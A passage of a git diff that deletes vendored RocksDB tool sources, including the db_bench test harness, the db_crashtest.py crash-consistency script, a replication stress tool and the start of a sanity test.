-
-  // Note options sanitization may increase thread pool sizes according to
-  // max_background_flushes/max_background_compactions/max_background_jobs
-  FLAGS_env->SetBackgroundThreads(FLAGS_num_high_pri_threads,
-                                  rocksdb::Env::Priority::HIGH);
-  FLAGS_env->SetBackgroundThreads(FLAGS_num_bottom_pri_threads,
-                                  rocksdb::Env::Priority::BOTTOM);
-  FLAGS_env->SetBackgroundThreads(FLAGS_num_low_pri_threads,
-                                  rocksdb::Env::Priority::LOW);
-
-  // Choose a location for the test database if none given with --db=<path>
-  if (FLAGS_db.empty()) {
-    std::string default_db_path;
-    rocksdb::Env::Default()->GetTestDirectory(&default_db_path);
-    default_db_path += "/dbbench";
-    FLAGS_db = default_db_path;
-  }
-
-  if (FLAGS_stats_interval_seconds > 0) {
-    // When both are set then FLAGS_stats_interval determines the frequency
-    // at which the timer is checked for FLAGS_stats_interval_seconds
-    FLAGS_stats_interval = 1000;
-  }
-
-  rocksdb::Benchmark benchmark;
-  benchmark.Run();
-  return 0;
-}
-}  // namespace rocksdb
-#endif
diff --git a/thirdparty/rocksdb/tools/db_bench_tool_test.cc b/thirdparty/rocksdb/tools/db_bench_tool_test.cc
deleted file mode 100644
index 145f329..0000000
--- a/thirdparty/rocksdb/tools/db_bench_tool_test.cc
+++ /dev/null
@@ -1,318 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "rocksdb/db_bench_tool.h"
-#include "options/options_parser.h"
-#include "rocksdb/utilities/options_util.h"
-#include "util/random.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-#ifdef GFLAGS
-#include <gflags/gflags.h>
-
-namespace rocksdb {
-namespace {
-static const int kMaxArgCount = 100;
-static const size_t kArgBufferSize = 100000;
-}  // namespace
-
-class DBBenchTest : public testing::Test {
- public:
-  DBBenchTest() : rnd_(0xFB) {
-    test_path_ = test::TmpDir() + "/db_bench_test";
-    Env::Default()->CreateDir(test_path_);
-    db_path_ = test_path_ + "/db";
-    wal_path_ = test_path_ + "/wal";
-  }
-
-  ~DBBenchTest() {
-    //  DestroyDB(db_path_, Options());
-  }
-
-  void ResetArgs() {
-    argc_ = 0;
-    cursor_ = 0;
-    memset(arg_buffer_, 0, kArgBufferSize);
-  }
-
-  void AppendArgs(const std::vector<std::string>& args) {
-    for (const auto& arg : args) {
-      ASSERT_LE(cursor_ + arg.size() + 1, kArgBufferSize);
-      ASSERT_LE(argc_ + 1, kMaxArgCount);
-      snprintf(arg_buffer_ + cursor_, arg.size() + 1, "%s", arg.c_str());
-
-      argv_[argc_++] = arg_buffer_ + cursor_;
-      cursor_ += arg.size() + 1;
-    }
-  }
-
-  void RunDbBench(const std::string& options_file_name) {
-    AppendArgs({"./db_bench", "--benchmarks=fillseq", "--use_existing_db=0",
-                "--num=1000",
-                std::string(std::string("--db=") + db_path_).c_str(),
-                std::string(std::string("--wal_dir=") + wal_path_).c_str(),
-                std::string(std::string("--options_file=") + options_file_name)
-                    .c_str()});
-    ASSERT_EQ(0, db_bench_tool(argc(), argv()));
-  }
-
-  void VerifyOptions(const Options& opt) {
-    DBOptions loaded_db_opts;
-    std::vector<ColumnFamilyDescriptor> cf_descs;
-    ASSERT_OK(LoadLatestOptions(db_path_, Env::Default(), &loaded_db_opts,
-                                &cf_descs));
-
-    ASSERT_OK(
-        RocksDBOptionsParser::VerifyDBOptions(DBOptions(opt), loaded_db_opts));
-    ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(ColumnFamilyOptions(opt),
-                                                    cf_descs[0].options));
-
-    // check with the default rocksdb options and expect failure
-    ASSERT_NOK(
-        RocksDBOptionsParser::VerifyDBOptions(DBOptions(), loaded_db_opts));
-    ASSERT_NOK(RocksDBOptionsParser::VerifyCFOptions(ColumnFamilyOptions(),
-                                                     cf_descs[0].options));
-  }
-
-  char** argv() { return argv_; }
-
-  int argc() { return argc_; }
-
-  std::string db_path_;
-  std::string test_path_;
-  std::string wal_path_;
-
-  char arg_buffer_[kArgBufferSize];
-  char* argv_[kMaxArgCount];
-  int argc_ = 0;
-  int cursor_ = 0;
-  Random rnd_;
-};
-
-namespace {}  // namespace
-
-TEST_F(DBBenchTest, OptionsFile) {
-  const std::string kOptionsFileName = test_path_ + "/OPTIONS_test";
-
-  Options opt;
-  opt.create_if_missing = true;
-  opt.max_open_files = 256;
-  opt.max_background_compactions = 10;
-  opt.arena_block_size = 8388608;
-  ASSERT_OK(PersistRocksDBOptions(DBOptions(opt), {"default"},
-                                  {ColumnFamilyOptions(opt)}, kOptionsFileName,
-                                  Env::Default()));
-
-  // override the following options as db_bench will not take these
-  // options from the options file
-  opt.wal_dir = wal_path_;
-
-  RunDbBench(kOptionsFileName);
-
-  VerifyOptions(opt);
-}
-
-TEST_F(DBBenchTest, OptionsFileUniversal) {
-  const std::string kOptionsFileName = test_path_ + "/OPTIONS_test";
-
-  Options opt;
-  opt.compaction_style = kCompactionStyleUniversal;
-  opt.num_levels = 1;
-  opt.create_if_missing = true;
-  opt.max_open_files = 256;
-  opt.max_background_compactions = 10;
-  opt.arena_block_size = 8388608;
-  ASSERT_OK(PersistRocksDBOptions(DBOptions(opt), {"default"},
-                                  {ColumnFamilyOptions(opt)}, kOptionsFileName,
-                                  Env::Default()));
-
-  // override the following options as db_bench will not take these
-  // options from the options file
-  opt.wal_dir = wal_path_;
-
-  RunDbBench(kOptionsFileName);
-
-  VerifyOptions(opt);
-}
-
-TEST_F(DBBenchTest, OptionsFileMultiLevelUniversal) {
-  const std::string kOptionsFileName = test_path_ + "/OPTIONS_test";
-
-  Options opt;
-  opt.compaction_style = kCompactionStyleUniversal;
-  opt.num_levels = 12;
-  opt.create_if_missing = true;
-  opt.max_open_files = 256;
-  opt.max_background_compactions = 10;
-  opt.arena_block_size = 8388608;
-  ASSERT_OK(PersistRocksDBOptions(DBOptions(opt), {"default"},
-                                  {ColumnFamilyOptions(opt)}, kOptionsFileName,
-                                  Env::Default()));
-
-  // override the following options as db_bench will not take these
-  // options from the options file
-  opt.wal_dir = wal_path_;
-
-  RunDbBench(kOptionsFileName);
-
-  VerifyOptions(opt);
-}
-
-const std::string options_file_content = R"OPTIONS_FILE(
-[Version]
-  rocksdb_version=4.3.1
-  options_file_version=1.1
-
-[DBOptions]
-  wal_bytes_per_sync=1048576
-  delete_obsolete_files_period_micros=0
-  WAL_ttl_seconds=0
-  WAL_size_limit_MB=0
-  db_write_buffer_size=0
-  max_subcompactions=1
-  table_cache_numshardbits=4
-  max_open_files=-1
-  max_file_opening_threads=10
-  max_background_compactions=5
-  use_fsync=false
-  use_adaptive_mutex=false
-  max_total_wal_size=18446744073709551615
-  compaction_readahead_size=0
-  new_table_reader_for_compaction_inputs=false
-  keep_log_file_num=10
-  skip_stats_update_on_db_open=false
-  max_manifest_file_size=18446744073709551615
-  db_log_dir=
-  skip_log_error_on_recovery=false
-  writable_file_max_buffer_size=1048576
-  paranoid_checks=true
-  is_fd_close_on_exec=true
-  bytes_per_sync=1048576
-  enable_thread_tracking=true
-  recycle_log_file_num=0
-  create_missing_column_families=false
-  log_file_time_to_roll=0
-  max_background_flushes=1
-  create_if_missing=true
-  error_if_exists=false
-  delayed_write_rate=1048576
-  manifest_preallocation_size=4194304
-  allow_mmap_reads=false
-  allow_mmap_writes=false
-  use_direct_reads=false
-  use_direct_io_for_flush_and_compaction=false
-  stats_dump_period_sec=600
-  allow_fallocate=true
-  max_log_file_size=83886080
-  random_access_max_buffer_size=1048576
-  advise_random_on_open=true
-
-
-[CFOptions "default"]
-  compaction_filter_factory=nullptr
-  table_factory=BlockBasedTable
-  prefix_extractor=nullptr
-  comparator=leveldb.BytewiseComparator
-  compression_per_level=
-  max_bytes_for_level_base=104857600
-  bloom_locality=0
-  target_file_size_base=10485760
-  memtable_huge_page_size=0
-  max_successive_merges=1000
-  max_sequential_skip_in_iterations=8
-  arena_block_size=52428800
-  target_file_size_multiplier=1
-  source_compaction_factor=1
-  min_write_buffer_number_to_merge=1
-  max_write_buffer_number=2
-  write_buffer_size=419430400
-  max_grandparent_overlap_factor=10
-  max_bytes_for_level_multiplier=10
-  memtable_factory=SkipListFactory
-  compression=kSnappyCompression
-  min_partial_merge_operands=2
-  level0_stop_writes_trigger=100
-  num_levels=1
-  level0_slowdown_writes_trigger=50
-  level0_file_num_compaction_trigger=10
-  expanded_compaction_factor=25
-  soft_rate_limit=0.000000
-  max_write_buffer_number_to_maintain=0
-  verify_checksums_in_compaction=true
-  merge_operator=nullptr
-  memtable_prefix_bloom_bits=0
-  paranoid_file_checks=false
-  inplace_update_num_locks=10000
-  optimize_filters_for_hits=false
-  level_compaction_dynamic_level_bytes=false
-  inplace_update_support=false
-  compaction_style=kCompactionStyleUniversal
-  memtable_prefix_bloom_probes=6
-  purge_redundant_kvs_while_flush=true
-  filter_deletes=false
-  hard_pending_compaction_bytes_limit=0
-  disable_auto_compactions=false
-  compaction_measure_io_stats=false
-
-[TableOptions/BlockBasedTable "default"]
-  format_version=0
-  skip_table_builder_flush=false
-  cache_index_and_filter_blocks=false
-  flush_block_policy_factory=FlushBlockBySizePolicyFactory
-  hash_index_allow_collision=true
-  index_type=kBinarySearch
-  whole_key_filtering=true
-  checksum=kCRC32c
-  no_block_cache=false
-  block_size=32768
-  block_size_deviation=10
-  block_restart_interval=16
-  filter_policy=rocksdb.BuiltinBloomFilter
-)OPTIONS_FILE";
-
-TEST_F(DBBenchTest, OptionsFileFromFile) {
-  const std::string kOptionsFileName = test_path_ + "/OPTIONS_flash";
-  unique_ptr<WritableFile> writable;
-  ASSERT_OK(Env::Default()->NewWritableFile(kOptionsFileName, &writable,
-                                            EnvOptions()));
-  ASSERT_OK(writable->Append(options_file_content));
-  ASSERT_OK(writable->Close());
-
-  DBOptions db_opt;
-  std::vector<ColumnFamilyDescriptor> cf_descs;
-  ASSERT_OK(LoadOptionsFromFile(kOptionsFileName, Env::Default(), &db_opt,
-                                &cf_descs));
-  Options opt(db_opt, cf_descs[0].options);
-
-  opt.create_if_missing = true;
-
-  // override the following options as db_bench will not take these
-  // options from the options file
-  opt.wal_dir = wal_path_;
-
-  RunDbBench(kOptionsFileName);
-
-  VerifyOptions(opt);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  google::ParseCommandLineFlags(&argc, &argv, true);
-  return RUN_ALL_TESTS();
-}
-
-#else
-
-int main(int argc, char** argv) {
-  printf("Skip db_bench_tool_test as the required library GFLAG is missing.");
-}
-#endif  // #ifdef GFLAGS
diff --git a/thirdparty/rocksdb/tools/db_crashtest.py b/thirdparty/rocksdb/tools/db_crashtest.py
deleted file mode 100644
index d64da7a..0000000
--- a/thirdparty/rocksdb/tools/db_crashtest.py
+++ /dev/null
@@ -1,387 +0,0 @@
-#! /usr/bin/env python
-import os
-import re
-import sys
-import time
-import random
-import logging
-import tempfile
-import subprocess
-import shutil
-import argparse
-
-# params overwrite priority:
-#   for default:
-#       default_params < blackbox|whitebox_default_params < args
-#   for simple:
-#       simple_default_params < blackbox|whitebox_simple_default_params < args
-
-default_params = {
-    "block_size": 16384,
-    "cache_size": 1048576,
-    "use_clock_cache": "false",
-    "delpercent": 5,
-    "destroy_db_initially": 0,
-    "disable_wal": 0,
-    "allow_concurrent_memtable_write": 0,
-    "iterpercent": 10,
-    "max_background_compactions": 20,
-    "max_bytes_for_level_base": 10485760,
-    "max_key": 100000000,
-    "max_write_buffer_number": 3,
-    "memtablerep": "prefix_hash",
-    "mmap_read": lambda: random.randint(0, 1),
-    "open_files": 500000,
-    "prefix_size": 7,
-    "prefixpercent": 5,
-    "progress_reports": 0,
-    "readpercent": 45,
-    "reopen": 20,
-    "sync": 0,
-    "target_file_size_base": 2097152,
-    "target_file_size_multiplier": 2,
-    "threads": 32,
-    "verify_checksum": 1,
-    "write_buffer_size": 4 * 1024 * 1024,
-    "writepercent": 35,
-    "log2_keys_per_lock": 2,
-    "subcompactions": lambda: random.randint(1, 4),
-    "use_merge": lambda: random.randint(0, 1),
-    "use_full_merge_v1": lambda: random.randint(0, 1),
-}
-
-
-def get_dbname(test_name):
-    test_tmpdir = os.environ.get("TEST_TMPDIR")
-    if test_tmpdir is None or test_tmpdir == "":
-        dbname = tempfile.mkdtemp(prefix='rocksdb_crashtest_' + test_name)
-    else:
-        dbname = test_tmpdir + "/rocksdb_crashtest_" + test_name
-        shutil.rmtree(dbname, True)
-    return dbname
-
-blackbox_default_params = {
-    # total time for this script to test db_stress
-    "duration": 6000,
-    # time for one db_stress instance to run
-    "interval": 120,
-    # since we will be killing anyway, use large value for ops_per_thread
-    "ops_per_thread": 100000000,
-    "set_options_one_in": 10000,
-    "test_batches_snapshots": 1,
-}
-
-whitebox_default_params = {
-    "duration": 10000,
-    "log2_keys_per_lock": 10,
-    "nooverwritepercent": 1,
-    "ops_per_thread": 200000,
-    "test_batches_snapshots": lambda: random.randint(0, 1),
-    "write_buffer_size": 4 * 1024 * 1024,
-    "subcompactions": lambda: random.randint(1, 4),
-    "random_kill_odd": 888887,
-}
-
-simple_default_params = {
-    "block_size": 16384,
-    "cache_size": 1048576,
-    "use_clock_cache": "false",
-    "column_families": 1,
-    "delpercent": 5,
-    "destroy_db_initially": 0,
-    "disable_wal": 0,
-    "allow_concurrent_memtable_write": lambda: random.randint(0, 1),
-    "iterpercent": 10,
-    "max_background_compactions": 1,
-    "max_bytes_for_level_base": 67108864,
-    "max_key": 100000000,
-    "max_write_buffer_number": 3,
-    "memtablerep": "skip_list",
-    "mmap_read": lambda: random.randint(0, 1),
-    "prefix_size": 0,
-    "prefixpercent": 0,
-    "progress_reports": 0,
-    "readpercent": 50,
-    "reopen": 20,
-    "sync": 0,
-    "target_file_size_base": 16777216,
-    "target_file_size_multiplier": 1,
-    "test_batches_snapshots": 0,
-    "threads": 32,
-    "verify_checksum": 1,
-    "write_buffer_size": 32 * 1024 * 1024,
-    "writepercent": 35,
-    "subcompactions": lambda: random.randint(1, 4),
-}
-
-blackbox_simple_default_params = {
-    "duration": 6000,
-    "interval": 120,
-    "open_files": -1,
-    "ops_per_thread": 100000000,
-    "set_options_one_in": 0,
-    "test_batches_snapshots": 0,
-}
-
-whitebox_simple_default_params = {
-    "duration": 10000,
-    "log2_keys_per_lock": 10,
-    "nooverwritepercent": 1,
-    "open_files": 500000,
-    "ops_per_thread": 200000,
-    "write_buffer_size": 32 * 1024 * 1024,
-    "subcompactions": lambda: random.randint(1, 4),
-}
-
-
-def finalize_and_sanitize(src_params):
-    dest_params = dict([(k,  v() if callable(v) else v)
-                        for (k, v) in src_params.items()])
-    if dest_params.get("allow_concurrent_memtable_write", 1) == 1:
-        dest_params["memtablerep"] = "skip_list"
-    return dest_params
-
-
-def gen_cmd_params(args):
-    params = {}
-
-    if args.simple:
-        params.update(simple_default_params)
-        if args.test_type == 'blackbox':
-            params.update(blackbox_simple_default_params)
-        if args.test_type == 'whitebox':
-            params.update(whitebox_simple_default_params)
-
-    if not args.simple:
-        params.update(default_params)
-        if args.test_type == 'blackbox':
-            params.update(blackbox_default_params)
-        if args.test_type == 'whitebox':
-            params.update(whitebox_default_params)
-
-    for k, v in vars(args).items():
-        if v is not None:
-            params[k] = v
-    return params
-
-
-def gen_cmd(params):
-    cmd = ['./db_stress'] + [
-        '--{0}={1}'.format(k, v)
-        for k, v in finalize_and_sanitize(params).items()
-        if k not in set(['test_type', 'simple', 'duration', 'interval',
-                         'random_kill_odd'])
-        and v is not None]
-    return cmd
-
-
-# This script runs and kills db_stress multiple times. It checks consistency
-# in case of unsafe crashes in RocksDB.
-def blackbox_crash_main(args):
-    cmd_params = gen_cmd_params(args)
-    dbname = get_dbname('blackbox')
-    exit_time = time.time() + cmd_params['duration']
-
-    print("Running blackbox-crash-test with \n"
-          + "interval_between_crash=" + str(cmd_params['interval']) + "\n"
-          + "total-duration=" + str(cmd_params['duration']) + "\n"
-          + "threads=" + str(cmd_params['threads']) + "\n"
-          + "ops_per_thread=" + str(cmd_params['ops_per_thread']) + "\n"
-          + "write_buffer_size=" + str(cmd_params['write_buffer_size']) + "\n"
-          + "subcompactions=" + str(cmd_params['subcompactions']) + "\n")
-
-    while time.time() < exit_time:
-        run_had_errors = False
-        killtime = time.time() + cmd_params['interval']
-
-        cmd = gen_cmd(dict(cmd_params.items() + {'db': dbname}.items()))
-
-        child = subprocess.Popen(cmd, stderr=subprocess.PIPE)
-        print("Running db_stress with pid=%d: %s\n\n"
-              % (child.pid, ' '.join(cmd)))
-
-        stop_early = False
-        while time.time() < killtime:
-            if child.poll() is not None:
-                print("WARNING: db_stress ended before kill: exitcode=%d\n"
-                      % child.returncode)
-                stop_early = True
-                break
-            time.sleep(1)
-
-        if not stop_early:
-            if child.poll() is not None:
-                print("WARNING: db_stress ended before kill: exitcode=%d\n"
-                      % child.returncode)
-            else:
-                child.kill()
-                print("KILLED %d\n" % child.pid)
-                time.sleep(1)  # time to stabilize after a kill
-
-        while True:
-            line = child.stderr.readline().strip()
-            if line != '' and not line.startswith('WARNING'):
-                run_had_errors = True
-                print('stderr has error message:')
-                print('***' + line + '***')
-            else:
-                break
-
-        if run_had_errors:
-            sys.exit(2)
-
-        time.sleep(1)  # time to stabilize before the next run
-
-    # we need to clean up after ourselves -- only do this on test success
-    shutil.rmtree(dbname, True)
-
-
-# This python script runs db_stress multiple times. Some runs with
-# kill_random_test that causes rocksdb to crash at various points in code.
-def whitebox_crash_main(args):
-    cmd_params = gen_cmd_params(args)
-    dbname = get_dbname('whitebox')
-
-    cur_time = time.time()
-    exit_time = cur_time + cmd_params['duration']
-    half_time = cur_time + cmd_params['duration'] / 2
-
-    print("Running whitebox-crash-test with \n"
-          + "total-duration=" + str(cmd_params['duration']) + "\n"
-          + "threads=" + str(cmd_params['threads']) + "\n"
-          + "ops_per_thread=" + str(cmd_params['ops_per_thread']) + "\n"
-          + "write_buffer_size=" + str(cmd_params['write_buffer_size']) + "\n"
-          + "subcompactions=" + str(cmd_params['subcompactions']) + "\n")
-
-    total_check_mode = 4
-    check_mode = 0
-    kill_random_test = cmd_params['random_kill_odd']
-    kill_mode = 0
-
-    while time.time() < exit_time:
-        if check_mode == 0:
-            additional_opts = {
-                # use large ops per thread since we will kill it anyway
-                "ops_per_thread": 100 * cmd_params['ops_per_thread'],
-            }
-            # run with kill_random_test, with three modes.
-            # Mode 0 covers all kill points. Mode 1 covers less kill points but
-            # increases change of triggering them. Mode 2 covers even less
-            # frequent kill points and further increases triggering change.
-            if kill_mode == 0:
-                additional_opts.update({
-                    "kill_random_test": kill_random_test,
-                })
-            elif kill_mode == 1:
-                additional_opts.update({
-                    "kill_random_test": (kill_random_test / 10 + 1),
-                    "kill_prefix_blacklist": "WritableFileWriter::Append,"
-                    + "WritableFileWriter::WriteBuffered",
-                })
-            elif kill_mode == 2:
-                # TODO: May need to adjust random odds if kill_random_test
-                # is too small.
-                additional_opts.update({
-                    "kill_random_test": (kill_random_test / 5000 + 1),
-                    "kill_prefix_blacklist": "WritableFileWriter::Append,"
-                    "WritableFileWriter::WriteBuffered,"
-                    "PosixMmapFile::Allocate,WritableFileWriter::Flush",
-                })
-            # Run kill mode 0, 1 and 2 by turn.
-            kill_mode = (kill_mode + 1) % 3
-        elif check_mode == 1:
-            # normal run with universal compaction mode
-            additional_opts = {
-                "kill_random_test": None,
-                "ops_per_thread": cmd_params['ops_per_thread'],
-                "compaction_style": 1,
-            }
-        elif check_mode == 2:
-            # normal run with FIFO compaction mode
-            # ops_per_thread is divided by 5 because FIFO compaction
-            # style is quite a bit slower on reads with lot of files
-            additional_opts = {
-                "kill_random_test": None,
-                "ops_per_thread": cmd_params['ops_per_thread'] / 5,
-                "compaction_style": 2,
-            }
-        else:
-            # normal run
-            additional_opts = additional_opts = {
-                "kill_random_test": None,
-                "ops_per_thread": cmd_params['ops_per_thread'],
-            }
-
-        cmd = gen_cmd(dict(cmd_params.items() + additional_opts.items()
-                           + {'db': dbname}.items()))
-
-        print "Running:" + ' '.join(cmd) + "\n"
-
-        popen = subprocess.Popen(cmd, stdout=subprocess.PIPE,
-                                 stderr=subprocess.STDOUT)
-        stdoutdata, stderrdata = popen.communicate()
-        retncode = popen.returncode
-        msg = ("check_mode={0}, kill option={1}, exitcode={2}\n".format(
-               check_mode, additional_opts['kill_random_test'], retncode))
-        print msg
-        print stdoutdata
-
-        expected = False
-        if additional_opts['kill_random_test'] is None and (retncode == 0):
-            # we expect zero retncode if no kill option
-            expected = True
-        elif additional_opts['kill_random_test'] is not None and retncode < 0:
-            # we expect negative retncode if kill option was given
-            expected = True
-
-        if not expected:
-            print "TEST FAILED. See kill option and exit code above!!!\n"
-            sys.exit(1)
-
-        stdoutdata = stdoutdata.lower()
-        errorcount = (stdoutdata.count('error') -
-                      stdoutdata.count('got errors 0 times'))
-        print "#times error occurred in output is " + str(errorcount) + "\n"
-
-        if (errorcount > 0):
-            print "TEST FAILED. Output has 'error'!!!\n"
-            sys.exit(2)
-        if (stdoutdata.find('fail') >= 0):
-            print "TEST FAILED. Output has 'fail'!!!\n"
-            sys.exit(2)
-
-        # First half of the duration, keep doing kill test. For the next half,
-        # try different modes.
-        if time.time() > half_time:
-            # we need to clean up after ourselves -- only do this on test
-            # success
-            shutil.rmtree(dbname, True)
-            check_mode = (check_mode + 1) % total_check_mode
-
-        time.sleep(1)  # time to stabilize after a kill
-
-
-def main():
-    parser = argparse.ArgumentParser(description="This script runs and kills \
-        db_stress multiple times")
-    parser.add_argument("test_type", choices=["blackbox", "whitebox"])
-    parser.add_argument("--simple", action="store_true")
-
-    all_params = dict(default_params.items()
-                      + blackbox_default_params.items()
-                      + whitebox_default_params.items()
-                      + simple_default_params.items()
-                      + blackbox_simple_default_params.items()
-                      + whitebox_simple_default_params.items())
-
-    for k, v in all_params.items():
-        parser.add_argument("--" + k, type=type(v() if callable(v) else v))
-    args = parser.parse_args()
-
-    if args.test_type == 'blackbox':
-        blackbox_crash_main(args)
-    if args.test_type == 'whitebox':
-        whitebox_crash_main(args)
-
-if __name__ == '__main__':
-    main()
diff --git a/thirdparty/rocksdb/tools/db_repl_stress.cc b/thirdparty/rocksdb/tools/db_repl_stress.cc
deleted file mode 100644
index fac73c0..0000000
--- a/thirdparty/rocksdb/tools/db_repl_stress.cc
+++ /dev/null
@@ -1,158 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-#ifndef GFLAGS
-#include <cstdio>
-int main() {
-  fprintf(stderr, "Please install gflags to run rocksdb tools\n");
-  return 1;
-}
-#else
-
-#include <cstdio>
-#include <atomic>
-
-#include <gflags/gflags.h>
-
-#include "db/write_batch_internal.h"
-#include "rocksdb/db.h"
-#include "rocksdb/types.h"
-#include "util/testutil.h"
-
-// Run a thread to perform Put's.
-// Another thread uses GetUpdatesSince API to keep getting the updates.
-// options :
-// --num_inserts = the num of inserts the first thread should perform.
-// --wal_ttl = the wal ttl for the run.
-
-using namespace rocksdb;
-
-using GFLAGS::ParseCommandLineFlags;
-using GFLAGS::SetUsageMessage;
-
-struct DataPumpThread {
-  size_t no_records;
-  DB* db; // Assumption DB is Open'ed already.
-};
-
-static std::string RandomString(Random* rnd, int len) {
-  std::string r;
-  test::RandomString(rnd, len, &r);
-  return r;
-}
-
-static void DataPumpThreadBody(void* arg) {
-  DataPumpThread* t = reinterpret_cast<DataPumpThread*>(arg);
-  DB* db = t->db;
-  Random rnd(301);
-  size_t i = 0;
-  while(i++ < t->no_records) {
-    if(!db->Put(WriteOptions(), Slice(RandomString(&rnd, 500)),
-                Slice(RandomString(&rnd, 500))).ok()) {
-      fprintf(stderr, "Error in put\n");
-      exit(1);
-    }
-  }
-}
-
-struct ReplicationThread {
-  std::atomic<bool> stop;
-  DB* db;
-  volatile size_t no_read;
-};
-
-static void ReplicationThreadBody(void* arg) {
-  ReplicationThread* t = reinterpret_cast<ReplicationThread*>(arg);
-  DB* db = t->db;
-  unique_ptr<TransactionLogIterator> iter;
-  SequenceNumber currentSeqNum = 1;
-  while (!t->stop.load(std::memory_order_acquire)) {
-    iter.reset();
-    Status s;
-    while(!db->GetUpdatesSince(currentSeqNum, &iter).ok()) {
-      if (t->stop.load(std::memory_order_acquire)) {
-        return;
-      }
-    }
-    fprintf(stderr, "Refreshing iterator\n");
-    for(;iter->Valid(); iter->Next(), t->no_read++, currentSeqNum++) {
-      BatchResult res = iter->GetBatch();
-      if (res.sequence != currentSeqNum) {
-        fprintf(stderr,
-                "Missed a seq no. b/w %ld and %ld\n",
-                (long)currentSeqNum,
-                (long)res.sequence);
-        exit(1);
-      }
-    }
-  }
-}
-
-DEFINE_uint64(num_inserts, 1000, "the num of inserts the first thread should"
-              " perform.");
-DEFINE_uint64(wal_ttl_seconds, 1000, "the wal ttl for the run(in seconds)");
-DEFINE_uint64(wal_size_limit_MB, 10, "the wal size limit for the run"
-              "(in MB)");
-
-int main(int argc, const char** argv) {
-  SetUsageMessage(
-      std::string("\nUSAGE:\n") + std::string(argv[0]) +
-      " --num_inserts=<num_inserts> --wal_ttl_seconds=<WAL_ttl_seconds>" +
-      " --wal_size_limit_MB=<WAL_size_limit_MB>");
-  ParseCommandLineFlags(&argc, const_cast<char***>(&argv), true);
-
-  Env* env = Env::Default();
-  std::string default_db_path;
-  env->GetTestDirectory(&default_db_path);
-  default_db_path += "db_repl_stress";
-  Options options;
-  options.create_if_missing = true;
-  options.WAL_ttl_seconds = FLAGS_wal_ttl_seconds;
-  options.WAL_size_limit_MB = FLAGS_wal_size_limit_MB;
-  DB* db;
-  DestroyDB(default_db_path, options);
-
-  Status s = DB::Open(options, default_db_path, &db);
-
-  if (!s.ok()) {
-    fprintf(stderr, "Could not open DB due to %s\n", s.ToString().c_str());
-    exit(1);
-  }
-
-  DataPumpThread dataPump;
-  dataPump.no_records = FLAGS_num_inserts;
-  dataPump.db = db;
-  env->StartThread(DataPumpThreadBody, &dataPump);
-
-  ReplicationThread replThread;
-  replThread.db = db;
-  replThread.no_read = 0;
-  replThread.stop.store(false, std::memory_order_release);
-
-  env->StartThread(ReplicationThreadBody, &replThread);
-  while(replThread.no_read < FLAGS_num_inserts);
-  replThread.stop.store(true, std::memory_order_release);
-  if (replThread.no_read < dataPump.no_records) {
-    // no. read should be => than inserted.
-    fprintf(stderr,
-            "No. of Record's written and read not same\nRead : %" ROCKSDB_PRIszt
-            " Written : %" ROCKSDB_PRIszt "\n",
-            replThread.no_read, dataPump.no_records);
-    exit(1);
-  }
-  fprintf(stderr, "Successful!\n");
-  exit(0);
-}
-
-#endif  // GFLAGS
-
-#else  // ROCKSDB_LITE
-#include <stdio.h>
-int main(int argc, char** argv) {
-  fprintf(stderr, "Not supported in lite mode.\n");
-  return 1;
-}
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/tools/db_sanity_test.cc b/thirdparty/rocksdb/tools/db_sanity_test.cc
deleted file mode 100644
index b40fe61..0000000
--- a/thirdparty/rocksdb/tools/db_sanity_test.cc
+++ /dev/null
@@ -1,297 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <cstdio>
-#include <cstdlib>
-#include <vector>
-#include <memory>
-
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "rocksdb/env.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/status.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/table.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/filter_policy.h"
-#include "port/port.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-class SanityTest {
- public:
-  explicit SanityTest(const std::string& path)
-      : env_(Env::Default()), path_(path) {
-    env_->CreateDirIfMissing(path);
-  }
-  virtual ~SanityTest() {}
-
-  virtual std::string Name() const = 0;
-  virtual Options GetOptions() const = 0;
-
-  Status Create() {
-    Options options = GetOptions();
-    options.create_if_missing = true;
-    std::string dbname = path_ + Name();
-    DestroyDB(dbname, options);
-    DB* db = nullptr;
-    Status s = DB::Open(options, dbname, &db);
-    std::unique_ptr<DB> db_guard(db);
-    if (!s.ok()) {
-      return s;
-    }
-    for (int i = 0; i < 1000000; ++i) {
-      std::string k = "key" + ToString(i);
-      std::string v = "value" + ToString(i);
-      s = db->Put(WriteOptions(), Slice(k), Slice(v));
-      if (!s.ok()) {
-        return s;
-      }
-    }
-    return db->Flush(FlushOptions());
-  }
-  Status Verify() {
-    DB* db = nullptr;
-    std::string dbname = path_ + Name();
-    Status s = DB::Open(GetOptions(), dbname, &db);
-    std::unique_ptr<DB> db_guard(db);
-    if (!s.ok()) {
-      return s;
-    }
-    for (int i = 0; i < 1000000; ++i) {
-      std::string k = "key" + ToString(i);
-      std::string v = "value" + ToString(i);
-      std::string result;
-      s = db->Get(ReadOptions(), Slice(k), &result);
-      if (!s.ok()) {
-        return s;
-      }
-      if (result != v) {
-        return Status::Corruption("Unexpected value for key " + k);
-      }
-    }
-    return Status::OK();
-  }
-
- private:
-  Env* env_;
-  std::string const path_;
-};
-
-class SanityTestBasic : public SanityTest {
- public:
